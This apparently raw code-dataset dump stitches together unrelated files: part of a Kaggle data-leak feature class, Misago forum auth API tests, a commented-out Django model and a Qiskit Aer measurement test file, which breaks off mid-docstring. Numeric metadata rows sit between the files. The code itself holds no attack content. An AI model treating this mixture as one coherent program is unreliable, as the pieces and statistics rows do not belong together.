'c83ce87d0', '7ba2e35d6', '027e67ec7', '43d99f930', '7eacd712f', 'c90b0b8a7', '939ae6e4a', '1e783ae1e', 'ebaaead05', '7417a6759', '260ff750c', 'ee99f8a68', '78144b68c', 'ce47f8cae', 'fb59499f9', '8ff55a752', '25a2e8b49', 'f9870621e', '27c5d13c9', '8cc831c8b', '2e51c4645', 'b169c8b90'), ('ca45bdef0', 'b4ff45038', '867c937bb', '546e67d8f', 'bf406b82b', '5dfd0ef29', '0c9516742', 'd72f25c1e', 'b9b7f388d', '4ddc6b32c', 'ed9e99c25', 'cef8a06cb', 'a7f6bf4a9', 'cc5570957', '1472ad855', '3f931e2b5', 'f4e855860', '605728195', '6186ea570', 'dd2ad0776', 'f6523474a', 'ffa903344', '20a58c359', 'af9c1bd29', 'ec863cb52', 'db6ba896a', '906d4316d', '5680531f3', '82df5774d', '5ea2238fd', 'b287947cc', '80c0c9910', '46ba3a162', 'd279be266', '66b39545f', 'e26149c9e', 'e1ccfad87', '5f9879270', '1d593ae5b', '2a7ac8010'), ('ccc7609f4', 'ca7ea80a3', 'e509be270', '3b8114ab0', 'a355497ac', '27998d0f4', 'fa05fd36e', '81aafdb57', '4e22de94f', 'f0d5ffe06', '9af753e9d', 'f1b6cc03f', '567d2715c', '857020d0f', '99fe351ec', '3e5dab1e3', '001476ffa', '5a5eabaa7', 'cb5587baa', '32cab3140', '313237030', '0f6386200', 'b961b0d59', '9452f2c5f', 'bcfb439ee', '04a22f489', '7e58426a4', 'a4c9ea341', 'ffdc4bcf8', '1a6d866d7', 'd7334935b', '298db341e', '08984f627', '8367dfc36', '5d9f43278', '7e3e026f8', '37c10d610', '5a88b7f01', '324e49f36', '99f466457'), ('ced6a7e91', '9df4daa99', '83c3779bf', 'edc84139a', 'f1e0ada11', '73687e512', 'aa164b93b', '342e7eb03', 'cd24eae8a', '8f3740670', '2b2a10857', 'a00adf70e', '3a48a2cd2', 'a396ceeb9', '9280f3d04', 'fec5eaf1a', '5b943716b', '22ed6dba3', '5547d6e11', 'e222309b0', '5d3b81ef8', '1184df5c2', '2288333b4', 'f39074b55', 'a8b721722', '13ee58af1', 'fb387ea33', '4da206d28', 'ea4046b8d', 'ef30f6be5', 'b85fa8b27', '2155f5e16', '794e93ca6', '070f95c99', '939f628a7', '7e814a30d', 'a6e871369', '0dc4d6c7d', 'bc70cbc26', 'aca228668'), ('d0d340214', '34d3715d5', '9c404d218', 'c624e6627', 'a1b169a3a', 'c144a70b1', 'b36a21d49', 'dfcf7c0fa', 'c63b4a070', '43ebb15de', '1f2a670dd', '3f07a4581', '0b1560062', 'e9f588de5', '65d14abf0', '9ed0e6ddb', '0b790ba3a', '9e89978e3', 'ee6264d2b', 'c86c0565e', '4de164057', '87ba924b1', '4d05e2995', '2c0babb55', 'e9375ad86', '8988e8da5', '8a1b76aaf', '724b993fd', '654dd8a3b', 'f423cf205', '3b54cc2cf', 'e04141e42', 'cacc1edae', '314396b31', '2c339d4f2', '3f8614071', '16d1d6204', '80b6e9a8b', 'a84cbdab5', '1a6d13c4a'), ('d48c44c49', 'e926d89d3', '4c0845957', '892f6f03e', '61b88b77a', '207021f50', 'bb12b7d99', 'e17a13988', 'bfe5872ea', '788e6045c', '8291f21d8', '36ba6bac3', '66e323ce9', 'a05f1bb14', 'b379107b3', '084031585', '571380d69', '640a36efb', '5a53ebb69', '33288f3b2', '32138f717', 'dd4649092', '8f993c285', '7b58b1340', 'a3fb71dbd', '773c101b5', '7f6e612c7', '122df5341', 'f95a762b0', '052f67cfa', 'c03c8799c', 'a3ef40228', 'e0ceabad4', '3c27b0b28', 'd833db6e1', '9303c6806', '36d35623e', '208308a47', '2f587f6a4', '23099cfb2'), ('df03d1653', '7fd35c77a', '133e6f674', '643ef6977', '9539d34c8', '9d2835f75', 'acc744336', 'c8a66413e', 'b80f3eab2', '437ff8730', 'e289bbcc3', 'dd48ed481', '90db65912', '9eab942f8', '753e0a307', '5e1085022', 'a4529b4ef', 'c9c6b51aa', '1346d1df0', '0a9735aba', '64226e620', 'de5e74ae7', 'd00f7d768', 'b4e4a184a', 'ef139d7ac', 'a6f5de07f', 'cb9333bd7', '4dfa4bc61', '5089bf842', '6f44294b2', 'ae1bd05ee', 'f807767c5', '067bcb836', 'd1cf68555', 'e5499c39d', '0bb06f4b5', 'b6336ff10', 'a84bafe34', '3e37bffde', '093b92da5'), ('df838756c', '2cb73ede7', '4dcf81d65', '61c1b7eb6', 'a9f61cf27', '1af4d24fa', 'e13b0c0aa', 'b9ba17eb6', '796c218e8', '37f57824c', 'd1e0f571b', 'f9e3b03b7', 'a3ef69ad5', 'e16a20511', '04b88be38', '99e779ee0', '9f7b782ac', '1dd7bca9f', '2eeadde2b', '6df033973', 'cdfc2b069', '031490e77', '5324862e4', '467bee277', 'a3fb07bfd', '64c6eb1cb', '8618bc1fd', '6b795a2bc', '956d228b9', '949ed0965', 'a4511cb0b', 'b64425521', '2e3c96323', '191e21b5f', 'bee629024', '1977eaf08', '5e645a169', '1d04efde3', '8675bec0b', '8337d1adc'), ('e1c250dbf', '81e3fed66', '4fc9da4e3', '175891ff4', '0b2e88d2d', '006e72749', 'f29217d2f', 'f6240919f', '232ecc840', 'd4087a281', '398cdc105', '3b67e9641', '73eeb092f', '06283f348', 'd7db08081', '2585a26fe', 'da59aa67e', '638d0b2e0', 'afc08501b', 'd974e8584', '433d408b2', '0989e152f', '357784061', '2e22a32fd', '184166328', '81f4bc3d8', 'd9fbf30dd', '5d52b2d2b', '0895b9597', '422acfada', 'a1868e9ec', '98c05b5b4', '8ff5cf8c3', 'bf257a3bc', 'f86eabcb9', 'c77f6dbfe', '014574363', 'bf2b3327b', '74f15ad1c', '7d9979702'), ('e20edfcb8', '842415efb', '300d6c1f1', '720f83290', '069a2c70b', '87a91f998', '611151826', '74507e97f', '504e4b156', 'baa95693d', 'cb4f34014', '5239ceb39', '81e02e0fa', 'dfdf4b580', 'fc9d04cd7', 'fe5d62533', 'bb6260a44', '08d1f69ef', 'b4ced4b7a', '98d90a1d1', 'b6d206324', '6456250f1', '96f5cf98a', 'f7c8c6ad3', 'cc73678bf', '5fb85905d', 'cb71f66af', '212e51bf6', 'd318bea95', 'b70c62d47', '11d86fa6a', '3988d0c5e', '42cf36d73', '9f494676e', '1c68ee044', 'a728310c8', '612bf9b47', '105233ed9', 'c18cc7d3d', 'f08c20722'), ('ec5764030', '42fdff3a0', 'fa6e76901', '6e76d5df3', '1c486f8dd', '2daf6b624', '9562ce5c8', 'cbf236577', '8e1822aa3', 'fd9968f0d', 'ed1f680d4', '6bd9d9ae3', '896d1c52d', 'b41a9fc75', 'a60974604', '9d6b84f39', '5661462ee', '186b87c05', 'e5ac02d3c', '0c4bf4863', '1fba6a5d5', '4f2f6b0b3', 'cd8048913', 'e17f1f07c', '707f193d9', '8ca08456c', '3adf5e2b5', 'a60027bb4', 'e7071d5e3', 'c7ae29e66', '50780ec40', 'f8b733d3f', '8485abcab', '994b4c2ac', '6af8b2246', 'dd85a900c', 'ccb68477c', '715fa74a4', 'adadb9a96', '77eb013ca'), ('f0317ca4f', '402b0d650', '7e78d546b', '2ad744c57', '47abb3cb4', '71ac2b961', '5b8c88c94', '293e2698e', '4bdeca0d2', '2ef8b7f4f', 'c380056bb', '2488e17f5', '20442bac4', '8e8736fc8', '8a4c53d3e', '62c547c8e', '86f13324d', 'da52febdb', '64e38e7a2', 'b0310a768', '0d866c3d7', '34a2f580b', '24bcc2f15', 'e1e8947d8', '05f11f48f', '8c8616b62', '79e0c374a', 'ad1466df8', 'f642213a6', 'f8405f8b9', '1ae0db9d5', '9dbb6b717', '0f7ae26ce', '81ec47b4c', 'ad4e33a4c', 'a78f85d49', '8de6fcbf1', '3ecc09859'), ('f0317ca4f', '402b0d650', '7e78d546b', '2ad744c57', '47abb3cb4', '71ac2b961', '5b8c88c94', '293e2698e', '4bdeca0d2', '2ef8b7f4f', 'c380056bb', '2488e17f5', '20442bac4', '8e8736fc8', '8a4c53d3e', '62c547c8e', '86f13324d', 'da52febdb', '64e38e7a2', 'b0310a768', '0d866c3d7', '34a2f580b', '24bcc2f15', 'e1e8947d8', '05f11f48f', '8c8616b62', '79e0c374a', 'ad1466df8', 'f642213a6', 'f8405f8b9', '1ae0db9d5', '9dbb6b717', '0f7ae26ce', '81ec47b4c', 'ad4e33a4c', 'a78f85d49', '8de6fcbf1', '3ecc09859', 'd2ef684ed', '9e39c29d0'), ('f1eeb56ae', '62ffce458', '497adaff8', 'ed1d5d137', 'faf7285a1', 'd83da5921', '0231f07ed', '7950f4c11', '051410e3d', '39e1796ab', '2e0148f29', '312832f30', '6f113540d', 'f3ee6ba3c', 'd9fc63fa1', '6a0b386ac', '5747a79a9', '64bf3a12a', 'c110ee2b7', '1bf37b3e2', 'fdd07cac1', '0872fe14d', 'ddef5ad30', '42088cf50', '3519bf4a4', 'a79b1f060', '97cc1b416', 'b2790ef54', '1a7de209c', '2a71f4027', 'f118f693a', '15e8a9331', '0c545307d', '363713112', '73e591019', '21af91e9b', '62a915028', '2ab5a56f5', 'a8ee55662', '316b978cd'), ('f3cf9341c', 'fa11da6df', 'd47c58fe2', '0d5215715', '555f18bd3', '134ac90df', '716e7d74d', 'c00611668', '1bf8c2597', '1f6b2bafa', '174edf08a', 'f1851d155', '5bc7ab64f', 'a61aa00b0', 'b2e82c050', '26417dec4', '53a550111', '51707c671', 'e8d9394a0', 'cbbc9c431', '6b119d8ce', 'f296082ec', 'be2e15279', '698d05d29', '38e6f8d32', '93ca30057', '7af000ac2', '1fd0a1f2a', '41bc25fef', '0df1d7b9a', '88d29cfaf', '2b2b5187e', 'bf59c51c3', 'cfe749e26', 'ad207f7bb', '11114a47a', '341daa7d1', 'a8dd5cea5', '7b672b310', 'b88e5de84'), ('fec5644cf', 'caa9883f6', '9437d8b64', '68811ba58', 'ef4b87773', 'ff558c2f2', '8d918c64f', '0b8e10df6', '2d6565ce2', '0fe78acfa', 'b75aa754d', '2ab9356a0', '4e86dd8f3', '348aedc21', 'd7568383a', '856856d94', '69900c0d1', '02c21443c', '5190d6dca', '20551fa5b', '79cc300c7', '8d8276242', 'da22ed2b8', '89cebceab', 'f171b61af', '3a07a8939', '129fe0263', 'e5b2d137a', 'aa7223176', '5ac7e84c4', '9bd66acf6', '4c938629c', 'e62c5ac64', '57535b55a', 'a1a0084e3', '2a3763e18', '474a9ec54', '0741f3757', '4fe8b17c2', 'd5754aa08')] # noqa 501 if dataset == 'train': x = [np.expand_dims(self.train_df.drop(["target"], axis=1)[ list(c)].values, axis=-1) for c in cols if len(c) == 40] if logloss: y = np.log1p(self.train_df["target"].values) else: y = self.train_df["target"].values if round_targets: y = np.around(y, decimals=round_targets) return np.concatenate(x, axis=-1), y elif dataset == 'test': x = [np.expand_dims(self.test_df[list(c)].values, axis=-1) for c in cols if len(c) == 40] return np.concatenate(x, axis=-1) def add_IsTargetAvaliable_as_feature(self, params=None, test=True, verbose=True, random_seed=43, threshold='soft', calc_on_selected_feat=False): '''Use a LightGBM model to predict if the target is one of the cols in the row''' if not params: params = { 'objective': 'binary', 'num_leaves': 20, 'min_data_in_leaf': 20, 'bagging_fraction': 0.6143, 'bagging_freq': 3, 'feature_fraction': 0.6453, 'min_split_gain': np.power(10, -2.5988), 'lambda_l1': np.power(10, -2.2887), 'lambda_l2': np.power(10, 1.7570), 'min_child_weight': np.power(10, -0.1477), 'verbose': -1, 'seed': 3, 'boosting_type': 'gbdt', 'max_depth': -1, 'learning_rate': 0.05, # 0.05 'metric': 'rmse', 'device': 'cpu', 'num_threads': 8 } model = LightGBM(**params) if calc_on_selected_feat: train_df = self.keep_only_selected_features( 'train', return_only=True) x = train_df.drop('target', axis=1).values x = np.concatenate([x, self.train_agg.values], axis=-1) target = train_df['target'].values y = np.array([target[i] in x[i] for i in range(x.shape[0])]).astype(np.int) else: x, target = self.get_train_data( use_aggregates=True, logloss=False) y = np.array([target[i] in x[i] for i in range(x.shape[0])]).astype(np.int) if test: if calc_on_selected_feat: test_df = self.keep_only_selected_features( 'test', return_only=True) x_test = test_df.values else: x_test = self.get_test_data() test_feat = model.cv_predict(x, y, x_test, random_seed=random_seed, logloss=False, return_oof_pred=False) else: model.cv(x, y, random_seed=random_seed, oof_pred=False) # Add to aggregates train_agg = pd.DataFrame(dict(is_label=y), index=self.train_df.index) self.train_agg = pd.concat([self.train_agg, train_agg], axis=1) if test: if threshold == 'hard': thresh = 0.5 elif threshold == 'soft': thresh = 1572 / (2887 + 1572) else: raise (('Invalid threshold param, must be', 'either "hard" or "soft"')) test_feat[test_feat <= thresh] = 0 test_feat[test_feat > thresh] = 1 test_agg = pd.DataFrame( dict(is_label=test_feat), index=self.test_df.index) self.test_agg = pd.concat([self.test_agg, test_agg], axis=1) def get_validation_set_from_leaky_test(self, sub_path, logloss=False, return_index=False): '''Use leaky rows from test as validation set''' val_df = load_df_from_path(sub_path) idx = list(val_df[val_df.target > 0].index) val_df = val_df.target.values X_test = self.get_test_data()[val_df > 0] Y_test = val_df[val_df > 0] if logloss: Y_test = np.log1p(Y_test) if return_index: return idx, X_test, Y_test else: return X_test, Y_test # def get_train_data_plus_leaky_test_rows(self, **kwargs): # '''Get leaky test rows as additional training data''' # get_train_data if __name__ == '__main__': train_path = './train.csv' test_path = './test.csv' dataset = KaggleDataset(train_path, test_path=test_path) print(dataset.train_df.describe(), dataset.test_df.describe())
149.918632
44,542
0.653554
11,626
127,131
7.044641
0.315242
0.013419
0.013016
0.010989
0.905178
0.89099
0.878903
0.869061
0.860795
0.853616
0
0.362693
0.14688
127,131
847
44,543
150.095632
0.392447
0.027704
0
0.38209
0
0.002985
0.523233
0.005932
0
0
0
0
0.002985
1
0.049254
false
0
0.035821
0
0.120896
0.022388
0
0
0
null
0
0
0
1
1
1
1
1
1
0
1
0
0
0
1
1
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
10
40d36b560fb0ff461130b08c0480db6262a03251
16,298
py
Python
misago/users/tests/test_auth_api.py
HenryChenV/iJiangNan
68f156d264014939f0302222e16e3125119dd3e3
[ "MIT" ]
1
2017-07-25T03:04:36.000Z
2017-07-25T03:04:36.000Z
misago/users/tests/test_auth_api.py
HenryChenV/iJiangNan
68f156d264014939f0302222e16e3125119dd3e3
[ "MIT" ]
null
null
null
misago/users/tests/test_auth_api.py
HenryChenV/iJiangNan
68f156d264014939f0302222e16e3125119dd3e3
[ "MIT" ]
null
null
null
from django.contrib.auth import get_user_model from django.core import mail from django.test import TestCase from misago.users.models import Ban from misago.users.tokens import make_password_change_token UserModel = get_user_model() class GatewayTests(TestCase): def test_api_invalid_credentials(self): """login api returns 400 on invalid POST""" response = self.client.post( '/api/auth/', data={ 'username': 'nope', 'password': 'nope', } ) self.assertContains(response, "Login or password is incorrect.", status_code=400) response = self.client.get('/api/auth/') self.assertEqual(response.status_code, 200) user_json = response.json() self.assertIsNone(user_json['id']) def test_login(self): """api signs user in""" user = UserModel.objects.create_user('Bob', 'bob@test.com', 'Pass.123') response = self.client.post( '/api/auth/', data={ 'username': 'Bob', 'password': 'Pass.123', }, ) self.assertEqual(response.status_code, 200) response = self.client.get('/api/auth/') self.assertEqual(response.status_code, 200) user_json = response.json() self.assertEqual(user_json['id'], user.id) self.assertEqual(user_json['username'], user.username) def test_login_whitespaces_password(self): """api signs user in with password left untouched""" user = UserModel.objects.create_user('Bob', 'bob@test.com', ' Pass.123 ') response = self.client.post( '/api/auth/', data={ 'username': 'Bob', 'password': 'Pass.123', }, ) self.assertEqual(response.status_code, 400) response = self.client.post( '/api/auth/', data={ 'username': 'Bob', 'password': ' Pass.123 ', }, ) self.assertEqual(response.status_code, 200) response = self.client.get('/api/auth/') self.assertEqual(response.status_code, 200) user_json = response.json() self.assertEqual(user_json['id'], user.id) self.assertEqual(user_json['username'], user.username) def test_submit_empty(self): """login api errors for no body""" response = self.client.post('/api/auth/') self.assertContains(response, 'empty_data', status_code=400) def test_login_banned(self): """login api fails to sign banned user in""" UserModel.objects.create_user('Bob', 'bob@test.com', 'Pass.123') ban = Ban.objects.create( check_type=Ban.USERNAME, banned_value='bob', user_message='You are tragically banned.', ) response = self.client.post( '/api/auth/', data={ 'username': 'Bob', 'password': 'Pass.123', }, ) self.assertEqual(response.status_code, 400) response_json = response.json() self.assertEqual(response_json['code'], 'banned') self.assertEqual(response_json['detail']['message']['plain'], ban.user_message) self.assertEqual( response_json['detail']['message']['html'], '<p>%s</p>' % ban.user_message ) response = self.client.get('/api/auth/') self.assertEqual(response.status_code, 200) user_json = response.json() self.assertIsNone(user_json['id']) def test_login_banned_staff(self): """login api signs banned staff member in""" user = UserModel.objects.create_user('Bob', 'bob@test.com', 'Pass.123') user.is_staff = True user.save() Ban.objects.create( check_type=Ban.USERNAME, banned_value='bob', user_message='You are tragically banned.', ) response = self.client.post( '/api/auth/', data={ 'username': 'Bob', 'password': 'Pass.123', }, ) self.assertEqual(response.status_code, 200) response = self.client.get('/api/auth/') self.assertEqual(response.status_code, 200) user_json = response.json() self.assertEqual(user_json['id'], user.id) self.assertEqual(user_json['username'], user.username) def test_login_inactive_admin(self): """login api fails to sign admin-activated user in""" UserModel.objects.create_user('Bob', 'bob@test.com', 'Pass.123', requires_activation=1) response = self.client.post( '/api/auth/', data={ 'username': 'Bob', 'password': 'Pass.123', }, ) self.assertEqual(response.status_code, 400) response_json = response.json() self.assertEqual(response_json['code'], 'inactive_user') response = self.client.get('/api/auth/') self.assertEqual(response.status_code, 200) user_json = response.json() self.assertIsNone(user_json['id']) def test_login_inactive_user(self): """login api fails to sign user-activated user in""" UserModel.objects.create_user('Bob', 'bob@test.com', 'Pass.123', requires_activation=2) response = self.client.post( '/api/auth/', data={ 'username': 'Bob', 'password': 'Pass.123', }, ) self.assertEqual(response.status_code, 400) response_json = response.json() self.assertEqual(response_json['code'], 'inactive_admin') response = self.client.get('/api/auth/') self.assertEqual(response.status_code, 200) user_json = response.json() self.assertIsNone(user_json['id']) def test_login_disabled_user(self): """its impossible to sign in to disabled account""" user = UserModel.objects.create_user('Bob', 'bob@test.com', 'Pass.123', is_active=False) user.is_staff = True user.save() response = self.client.post( '/api/auth/', data={ 'username': 'Bob', 'password': 'Pass.123', }, ) self.assertContains(response, "Login or password is incorrect.", status_code=400) response = self.client.get('/api/auth/') self.assertEqual(response.status_code, 200) user_json = response.json() self.assertIsNone(user_json['id']) class UserCredentialsTests(TestCase): def test_edge_returns_response(self): """api edge has no showstoppers""" response = self.client.get('/api/auth/criteria/') self.assertEqual(response.status_code, 200) class SendActivationAPITests(TestCase): def setUp(self): self.user = UserModel.objects.create_user('Bob', 'bob@test.com', 'Pass.123') self.user.requires_activation = 1 self.user.save() self.link = '/api/auth/send-activation/' def test_submit_valid(self): """request activation link api sends reset link mail""" response = self.client.post( self.link, data={ 'email': self.user.email, }, ) self.assertEqual(response.status_code, 200) self.assertIn('Activate Bob', mail.outbox[0].subject) def test_submit_banned(self): """request activation link api passes for banned users""" Ban.objects.create( check_type=Ban.USERNAME, banned_value=self.user.username, user_message='Nope!', ) response = self.client.post( self.link, data={ 'email': self.user.email, }, ) self.assertEqual(response.status_code, 200) self.assertIn('Activate Bob', mail.outbox[0].subject) def test_submit_disabled(self): """request activation link api fails disabled users""" self.user.is_active = False self.user.save() response = self.client.post( self.link, data={ 'email': self.user.email, }, ) self.assertContains(response, 'not_found', status_code=400) self.assertTrue(not mail.outbox) def test_submit_empty(self): """request activation link api errors for no body""" response = self.client.post(self.link) self.assertContains(response, 'empty_email', status_code=400) self.assertTrue(not mail.outbox) def test_submit_invalid(self): """request activation link api errors for invalid email""" response = self.client.post( self.link, data={ 'email': 'fake@mail.com', }, ) self.assertContains(response, 'not_found', status_code=400) self.assertTrue(not mail.outbox) def test_submit_active_user(self): """request activation link api errors for active user""" self.user.requires_activation = 0 self.user.save() response = self.client.post( self.link, data={ 'email': self.user.email, }, ) self.assertContains(response, 'Bob, your account is already active.', status_code=400) def test_submit_inactive_user(self): """request activation link api errors for admin-activated users""" self.user.requires_activation = 2 self.user.save() response = self.client.post( self.link, data={ 'email': self.user.email, }, ) self.assertContains(response, 'inactive_admin', status_code=400) self.assertTrue(not mail.outbox) # but succeed for user-activated self.user.requires_activation = 1 self.user.save() response = self.client.post( self.link, data={ 'email': self.user.email, } ) self.assertEqual(response.status_code, 200) self.assertTrue(mail.outbox) class SendPasswordFormAPITests(TestCase): def setUp(self): self.user = UserModel.objects.create_user('Bob', 'bob@test.com', 'Pass.123') self.link = '/api/auth/send-password-form/' def test_submit_valid(self): """request change password form link api sends reset link mail""" response = self.client.post( self.link, data={ 'email': self.user.email, }, ) self.assertEqual(response.status_code, 200) self.assertIn('Change Bob password', mail.outbox[0].subject) def test_submit_banned(self): """request change password form link api sends reset link mail""" Ban.objects.create( check_type=Ban.USERNAME, banned_value=self.user.username, user_message='Nope!', ) response = self.client.post( self.link, data={ 'email': self.user.email, }, ) self.assertEqual(response.status_code, 200) self.assertIn('Change Bob password', mail.outbox[0].subject) def test_submit_disabled(self): """request change password form api fails disabled users""" self.user.is_active = False self.user.save() response = self.client.post( self.link, data={ 'email': self.user.email, }, ) self.assertContains(response, 'not_found', status_code=400) self.assertTrue(not mail.outbox) def test_submit_empty(self): """request change password form link api errors for no body""" response = self.client.post(self.link) self.assertContains(response, 'empty_email', status_code=400) self.assertTrue(not mail.outbox) def test_submit_invalid(self): """request change password form link api errors for invalid email""" response = self.client.post( self.link, data={ 'email': 'fake@mail.com', }, ) self.assertContains(response, 'not_found', status_code=400) self.assertTrue(not mail.outbox) def test_submit_inactive_user(self): """request change password form link api errors for inactive users""" self.user.requires_activation = 1 self.user.save() response = self.client.post( self.link, data={ 'email': self.user.email, }, ) self.assertContains(response, 'inactive_user', status_code=400) self.user.requires_activation = 2 self.user.save() response = self.client.post( self.link, data={ 'email': self.user.email, }, ) self.assertContains(response, 'inactive_admin', status_code=400) self.assertTrue(not mail.outbox) class ChangePasswordAPITests(TestCase): def setUp(self): self.user = UserModel.objects.create_user('Bob', 'bob@test.com', 'Pass.123') self.link = '/api/auth/change-password/%s/%s/' def test_submit_valid(self): """submit change password form api changes password""" response = self.client.post( self.link % (self.user.pk, make_password_change_token(self.user)), data={ 'password': 'n3wp4ss!', }, ) self.assertEqual(response.status_code, 200) user = UserModel.objects.get(id=self.user.pk) self.assertTrue(user.check_password('n3wp4ss!')) def test_submit_with_whitespaces(self): """submit change password form api changes password with whitespaces""" response = self.client.post( self.link % (self.user.pk, make_password_change_token(self.user)), data={ 'password': ' n3wp4ss! ', }, ) self.assertEqual(response.status_code, 200) user = UserModel.objects.get(id=self.user.pk) self.assertTrue(user.check_password(' n3wp4ss! ')) def test_invalid_token_link(self): """api errors on invalid user id link""" response = self.client.post(self.link % (self.user.pk, 'asda7ad89sa7d9s789as')) self.assertContains(response, "Form link is invalid.", status_code=400) def test_banned_user_link(self): """request errors because user is banned""" Ban.objects.create( check_type=Ban.USERNAME, banned_value=self.user.username, user_message='Nope!', ) response = self.client.post( self.link % (self.user.pk, make_password_change_token(self.user)) ) self.assertContains(response, "Your link has expired.", status_code=400) def test_inactive_user(self): """change password api errors for inactive users""" self.user.requires_activation = 1 self.user.save() response = self.client.post( self.link % (self.user.pk, make_password_change_token(self.user)) ) self.assertContains(response, "Your link has expired.", status_code=400) self.user.requires_activation = 2 self.user.save() response = self.client.post( self.link % (self.user.pk, make_password_change_token(self.user)) ) self.assertContains(response, "Your link has expired.", status_code=400) def test_disabled_user(self): """change password api errors for disabled users""" self.user.is_active = False self.user.save() response = self.client.post( self.link % (self.user.pk, make_password_change_token(self.user)) ) self.assertContains(response, "Form link is invalid.", status_code=400) def test_submit_empty(self): """change password api errors for empty body""" response = self.client.post( self.link % (self.user.pk, make_password_change_token(self.user)) ) self.assertContains(response, "This password is too shor", status_code=400)
31.46332
96
0.582157
1,798
16,298
5.151279
0.07842
0.04837
0.081624
0.078385
0.872166
0.85284
0.813755
0.801987
0.774563
0.758475
0
0.018544
0.295251
16,298
517
97
31.524178
0.787829
0.089213
0
0.701333
0
0
0.103927
0.005921
0
0
0
0
0.194667
1
0.088
false
0.109333
0.013333
0
0.114667
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
8
40dde4729546450d0598707b5cb861ccc65de6fa
699
py
Python
website/models.py
folse/MTS
183f7d479d5f6f90ad1bdd6a20d7ec334476dce1
[ "MIT" ]
null
null
null
website/models.py
folse/MTS
183f7d479d5f6f90ad1bdd6a20d7ec334476dce1
[ "MIT" ]
null
null
null
website/models.py
folse/MTS
183f7d479d5f6f90ad1bdd6a20d7ec334476dce1
[ "MIT" ]
null
null
null
#coding: utf-8 from django.db import models from django.contrib.auth.models import User # class PlaceModel(models.Model): # user = models.OneToOneField(User) # objectId = models.CharField(max_length=256) # name = models.CharField(max_length=32) # address = models.CharField(max_length=256) # category = models.CharField(max_length=128) # phone = models.CharField(max_length=32) # #photo = models.CharField(max_length=512) # open_hour = models.CharField(max_length=128) # latitude = models.CharField(max_length=32) # longitude = models.CharField(max_length=32) # news = models.CharField(max_length=512) # description = models.CharField(max_length=512)
41.117647
52
0.723891
90
699
5.488889
0.377778
0.334008
0.40081
0.534413
0.593117
0
0
0
0
0
0
0.050847
0.155937
699
17
52
41.117647
0.786441
0.854077
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
90526a32540c0b6cdf12a459ebe106f7cc0a7200
6,177
py
Python
test/terra/backends/qasm_simulator/qasm_measure.py
eliarbel/qiskit-aer
827f8922948dd18a588e8617bccaec465934280f
[ "Apache-2.0" ]
1
2019-07-26T05:04:14.000Z
2019-07-26T05:04:14.000Z
test/terra/backends/qasm_simulator/qasm_measure.py
eliarbel/qiskit-aer
827f8922948dd18a588e8617bccaec465934280f
[ "Apache-2.0" ]
29
2018-12-19T10:11:00.000Z
2018-12-19T10:16:18.000Z
test/terra/backends/qasm_simulator/qasm_measure.py
atilag/qiskit-aer
d964795b0a24b1d3287ba2ba2dda45d1dfed4a5d
[ "Apache-2.0" ]
null
null
null
# This code is part of Qiskit. # # (C) Copyright IBM 2018, 2019. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """ QasmSimulator Integration Tests """ from test.terra.reference import ref_measure from qiskit.compiler import assemble from qiskit.providers.aer import QasmSimulator class QasmMeasureTests: """QasmSimulator measure tests.""" SIMULATOR = QasmSimulator() BACKEND_OPTS = {} # --------------------------------------------------------------------- # Test measure # --------------------------------------------------------------------- def test_measure_deterministic_with_sampling(self): """Test QasmSimulator measure with deterministic counts with sampling""" shots = 100 circuits = ref_measure.measure_circuits_deterministic( allow_sampling=True) targets = ref_measure.measure_counts_deterministic(shots) qobj = assemble(circuits, self.SIMULATOR, shots=shots) result = self.SIMULATOR.run( qobj, backend_options=self.BACKEND_OPTS).result() self.is_completed(result) self.compare_counts(result, circuits, targets, delta=0) def test_measure_deterministic_without_sampling(self): """Test QasmSimulator measure with deterministic counts without sampling""" shots = 100 circuits = ref_measure.measure_circuits_deterministic( allow_sampling=False) targets = ref_measure.measure_counts_deterministic(shots) qobj = assemble(circuits, self.SIMULATOR, shots=shots) result = self.SIMULATOR.run( qobj, backend_options=self.BACKEND_OPTS).result() self.is_completed(result) self.compare_counts(result, circuits, targets, delta=0) def test_measure_nondeterministic_with_sampling(self): """Test QasmSimulator measure with non-deterministic counts with sampling""" shots = 2000 circuits = ref_measure.measure_circuits_nondeterministic( allow_sampling=True) targets = ref_measure.measure_counts_nondeterministic(shots) qobj = assemble(circuits, self.SIMULATOR, shots=shots) result = self.SIMULATOR.run( qobj, backend_options=self.BACKEND_OPTS).result() self.is_completed(result) self.compare_counts(result, circuits, targets, delta=0.05 * shots) def test_measure_nondeterministic_without_sampling(self): """Test QasmSimulator measure with nin-deterministic counts without sampling""" shots = 2000 circuits = ref_measure.measure_circuits_nondeterministic( allow_sampling=False) targets = ref_measure.measure_counts_nondeterministic(shots) qobj = assemble(circuits, self.SIMULATOR, shots=shots) result = self.SIMULATOR.run( qobj, backend_options=self.BACKEND_OPTS).result() self.is_completed(result) self.compare_counts(result, circuits, targets, delta=0.05 * shots) # --------------------------------------------------------------------- # Test multi-qubit measure qobj instruction # --------------------------------------------------------------------- def test_measure_deterministic_multi_qubit_with_sampling(self): """Test QasmSimulator multi-qubit measure with deterministic counts with sampling""" shots = 100 qobj = ref_measure.measure_circuits_qobj_deterministic( allow_sampling=True) qobj.config.shots = shots circuits = [experiment.header.name for experiment in qobj.experiments] targets = ref_measure.measure_counts_qobj_deterministic(shots) result = self.SIMULATOR.run( qobj, backend_options=self.BACKEND_OPTS).result() self.is_completed(result) self.compare_counts(result, circuits, targets, delta=0) def test_measure_deterministic_multi_qubit_without_sampling(self): """Test QasmSimulator multi-qubit measure with deterministic counts without sampling""" shots = 100 qobj = ref_measure.measure_circuits_qobj_deterministic( allow_sampling=False) qobj.config.shots = shots circuits = [experiment.header.name for experiment in qobj.experiments] targets = ref_measure.measure_counts_qobj_deterministic(shots) result = self.SIMULATOR.run( qobj, backend_options=self.BACKEND_OPTS).result() self.is_completed(result) self.compare_counts(result, circuits, targets, delta=0) def test_measure_nondeterministic_multi_qubit_with_sampling(self): """Test 